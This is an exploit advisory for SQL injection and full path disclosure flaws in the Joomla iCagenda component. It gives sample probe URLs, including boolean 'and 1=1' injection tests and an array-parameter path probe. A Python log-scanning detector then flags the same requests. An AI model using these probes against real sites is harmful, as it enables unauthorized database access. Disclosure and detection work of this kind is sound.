# Souhail Hammou - Independent Security Researcher & Penetration Tester .
# Facebook : www.facebook.com/dark.puzzle.sec
# E-mail : dark-puzzle@live.fr
# Greetings to all Moroccan researchers and white hats .
------------------------------------------------------------------------------
# Exploit Title: Joomla Component (com_icagenda) Multiple Vulnerabilities .
# Author: Dark-Puzzle (Souhail Hammou)
# Risk : Critical
# Version: All Versions
# Google Dork : N/A
# Category: Webapps
# Tested on: Windows XP SP2 Fr .
# OSVDB ID : 85147 and 85148 .
# OSVDB Links : http://osvdb.org/show/osvdb/85148 & http://osvdb.org/show/osvdb/85147
***************************************************************************************
Info :

iCagenda is a new component for event management with a calendar module.
----------------------------------------------------
I - Blind SQL Injection Vulnerability
----------------------------------------------------

Vulnerability :

The "id" parameter in com_icagenda is prone to a blind SQL injection vulnerability. An attacker can retrieve and steal data by sending a series of true and false queries through SQL statements.
Here the content that becomes invisible for the false query shows us that the target suffers from a blind SQL injection vulnerability.

Example :

server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True)
server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False)

ADMIN PANEL : http://target/administrator

-----------------------------------------------------
II - Full Path Disclosure Vulnerability
-----------------------------------------------------
The full path can be retrieved by passing the Itemid and id parameters as arrays ([]).

Example :

http://server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
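
Both issues above come down to the id and Itemid parameters reaching the component as something other than a plain integer, which is easy to spot in web server access logs. The following detection sketch is an added example, not part of the original advisory or of iCagenda's code; the function names, finding labels and log lines are constructed for illustration, and a combined-format access log is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names; both are expected to be plain integers.
WATCHED = ("id", "Itemid")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges, made-up timestamps).
BASE = "/index.php?option=com_icagenda&view=list&layout=event&Itemid=520"
SAMPLE_LOG = [
    f'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET {BASE}&id=1 HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET {BASE}&id=1%20and%201=1 HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET {BASE}&id=1%20and%201=2 HTTP/1.1" 200 2048',
    f'198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET {BASE}&id[]=1 HTTP/1.1" 200 911',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?option=com_content&id=abc HTTP/1.1" 200 300',
]

def classify_url(url):
    """Return sorted findings for one request URL; an empty list means clean."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if ("option", "com_icagenda") not in params:
        return []  # only requests routed to the affected component matter
    findings = set()
    for name, value in params:  # parse_qsl has already percent-decoded both
        base = name.split("[", 1)[0]
        if base not in WATCHED:
            continue
        if "[" in name:
            findings.add(f"array-typed {base} (path disclosure probe)")
        elif not re.fullmatch(r"\d+", value):
            findings.add(f"non-integer {base} (possible SQL injection)")
    return sorted(findings)

def scan_log(lines):
    """Yield (line_number, findings) for every log line with a finding."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = classify_url(match.group(1))
            if findings:
                yield number, findings

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(number, "; ".join(findings))
```

The same integer-only rule is what a fix on the server side has to enforce before the value is used in a query or passed to code that expects a scalar.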